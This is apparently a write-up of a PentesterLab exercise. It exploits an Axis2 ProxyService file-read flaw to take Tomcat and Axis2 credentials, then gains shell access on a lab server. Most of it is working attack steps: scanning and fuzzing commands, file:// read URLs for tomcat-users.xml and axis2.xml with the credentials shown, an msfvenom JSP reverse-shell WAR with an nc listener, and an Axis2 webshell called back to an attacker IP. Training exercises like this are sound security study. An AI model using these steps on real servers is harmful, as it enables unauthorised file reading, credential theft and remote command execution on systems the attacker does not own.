Pentesterlab--Axis2 Web Service and Tomcat Manager

When you engage in actual fighting, if victory is long in coming, then men’s weapons will grow dull and their ardor will be damped. If you lay siege to a town, you will exhaust your strength. —– The Art of War

This course details the exploitation of an issue in an Axis2 Web service and how using this issue it is possible to retrieve arbitrary files. Then using this, we will see how an attacker can retrieve Tomcat users' file to access the Tomcat Manager and gain commands execution on the server. —Pentesterlab

Difficluty: 3/5

Forces:

  • Nmap
  • wfuzz
  • nc
  • msfvenom

Detail Assessment and Planning

  • Port scan to identify opened ports, running services and services version. —Nmap
  • Burte force hidden path of the server. —-wfuzz
  • generate webshell. —msfvenom
  • backdoor. —nc
  • webshell. —Car.arr

Waging War

Weaknesses and Strengths

Used Nmap to idenfity opened ports. TCP port 80 is opened and Apache service is running on it.

nmap -sV -v -A 192.168.79.168

Use wfuzz to burte force hidden path of the server

1

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.168/FUZZ 2>/dev/null

Now we find that the server host a web service using Axis2.

In order to test is the web server using Tomcat, we can try to visit a non-existing web page and watch the 404 error page.

Now we find the server uses Tomcat and we get the version of the Tomcat. Keep going…

Lets check the path axis2/ , we get the page:

get the list of the available services by visiting the page http://192.168.79.168/axis2/services/listServices or click the serices link

The WSDL information can be accessed by clicking the service’s name in the listServices page or directly using the following URL: http://192.168.79.168/axis2/services/ProxyService?wsdl.

We can see that get operation is defined in WSDL

Axis2 provides an easy way to call Web services, you just need to follow the pattern http://[WS_URL]/method?parameters

Attack

Easy way

Get Tomcat manager configuration to get login credentials. In Debian Linux, the tomcat configuration file tomcat-users.xml has default location: /etc/tomcat6/tomcat-users.xml

So we can try:

1

http://192.168.79.168/axis2/services/ProxyService/get?uri=file:///etc/tomcat6/tomcat-users.xml

Then we get the Tomcat manager’s credentials:

the tomcat manager-gui login password can be found: username: manager password: !mp0ss!bl32gu355

Then login tomcat manager from the URL http://192.168.79.168/manager/html to upload and deploy JSP webshell in WAR file.

deploy webshell

Generate webshell:

1
2
3
4

$ mkdir webshell
$ cd webshell
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.79.156 LPORT=4444 -f raw > sh4.jsp
$ jar -cvf ../webshell.war *

Then uplpad the websehll.war to manager page

in Kali setup nc:

nc -nlvp 4444

go to http://192.168.79.168/webshell/sh4.jsp

then you will get the shell:

‘Hard’ way

In Debian Linux, the axis2 configuration file axis2.xml has default location: /var/lib/tomcat6/webapps/axis2/WEB-INF/conf/axis2.xml

so we can visit this page by using,

http://192.168.79.168/axis2/services/ProxyService/get?uri=file:///var/lib/tomcat6/webapps/axis2/WEB-INF/conf/axis2.xml

from axis2.xml, we find the credential is admin/axis2

Then login axis2 admin page from the URL http://192.168.79.168/axis2/axis2-admin/

then try to upload webshell.war we used in last method.

Looks like it doesn’t support the war file format. WTF, okay, try harder.

After google search, I found a webshell for axis2, called Cat.arr

Download it and upload it to the server, it requres host IP and port number:

1

192.168.79.168/axis2/services/Cat/shell?host=192.168.79.156&port=6666

Oh…..

apache, axis2, pentesterlab, tomcat